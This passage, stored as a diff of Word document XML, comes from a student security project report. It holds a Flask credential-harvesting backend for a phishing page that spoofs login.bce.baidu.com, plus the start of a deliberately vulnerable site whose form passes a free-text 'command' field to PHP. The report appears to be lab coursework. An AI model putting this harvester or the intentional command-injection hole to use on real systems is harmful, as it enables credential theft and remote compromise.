+        <w:pStyle w:val="Default"/>
+        <w:ind w:left="360"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>class Hacker(Resource):</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Default"/>
+        <w:ind w:left="360"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    def options(self,username, password):</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Default"/>
+        <w:ind w:left="360"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t xml:space="preserve">        with open('password.txt', 'wa') as f:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Default"/>
+        <w:ind w:left="360"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t xml:space="preserve">            f.write("username: "+str(username) +  "   password :  " +str(password))</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Default"/>
+        <w:ind w:left="360"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t xml:space="preserve">        return 200</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Default"/>
+        <w:ind w:left="360"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Default"/>
+        <w:ind w:left="360"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>if __name__ == '__main__':</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Default"/>
+        <w:ind w:left="360"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    app.run(debug=True, host="0.0.0.0", port=5000)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Default"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Default"/>
+        <w:ind w:left="360"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi" w:hint="eastAsia"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>W</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t xml:space="preserve">hen the victim device input “login.bce.baidu.com” on browser, it actually visits the local apache webserver set on raspberry Pi. After the user login with credentials, the javascript code </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi" w:hint="eastAsia"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>se</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>nds request to the backend and we get the credentials stored as a txt format.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Default"/>
+        <w:ind w:left="360"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Default"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>Segment 4_2</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Default"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Default"/>
+        <w:ind w:left="360"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi" w:hint="eastAsia"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>T</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t xml:space="preserve">o do a web-exploit attack, we initially create a vulnerable website that </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>contains</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> highly-risky function in</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> its</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> php code</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> (designed for remote desktop manager)</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t xml:space="preserve">. This website is deployed on my Ubuntu server and </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t>regarded as a victim machine.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Default"/>
+        <w:ind w:left="360"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Default"/>
+        <w:ind w:left="360"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi" w:hint="eastAsia"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>T</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>he index.html shows below:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Default"/>
+        <w:ind w:left="360"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Default"/>
+        <w:ind w:left="360"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>&lt;!DOCTYPE html&gt;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Default"/>
+        <w:ind w:left="360"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>&lt;html&gt;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Default"/>
+        <w:ind w:left="360"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>&lt;head&gt;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Default"/>
+        <w:ind w:left="360"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    &lt;title&gt;Vulnerable Site&lt;/title&gt;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Default"/>
+        <w:ind w:left="360"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>&lt;/head&gt;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Default"/>
+        <w:ind w:left="360"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>&lt;body&gt;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Default"/>
+        <w:ind w:left="360"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Default"/>
+        <w:ind w:left="360"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>&lt;h1&gt;This is a vulnerable site, COMP9337 Project&lt;/h1&gt;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Default"/>
+        <w:ind w:left="360"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>&lt;h2&gt;For demo, SWN19 AI&lt;/h2&gt;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Default"/>
+        <w:ind w:left="360"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Default"/>
+        <w:ind w:left="360"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>&lt;tr&gt;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Default"/>
+        <w:ind w:left="360"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    &lt;td&gt;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Default"/>
+        <w:ind w:left="360"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t xml:space="preserve">        &lt;form action="test.php" method="post"&gt;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Default"/>
+        <w:ind w:left="360"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t xml:space="preserve">            Remote Desktop Manager: &lt;input type="text" name="command"&gt;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Default"/>
+        <w:ind w:left="360"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t xml:space="preserve">        &lt;input type="submit" value="Submit" value="Send"&gt; </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Default"/>
+        <w:ind w:left="360"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    &lt;/td&gt;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Default"/>
+        <w:ind w:left="360"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>&lt;/tr&gt;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Default"/>
+        <w:ind w:left="360"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Default"/>
+        <w:ind w:left="360"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="22"/>
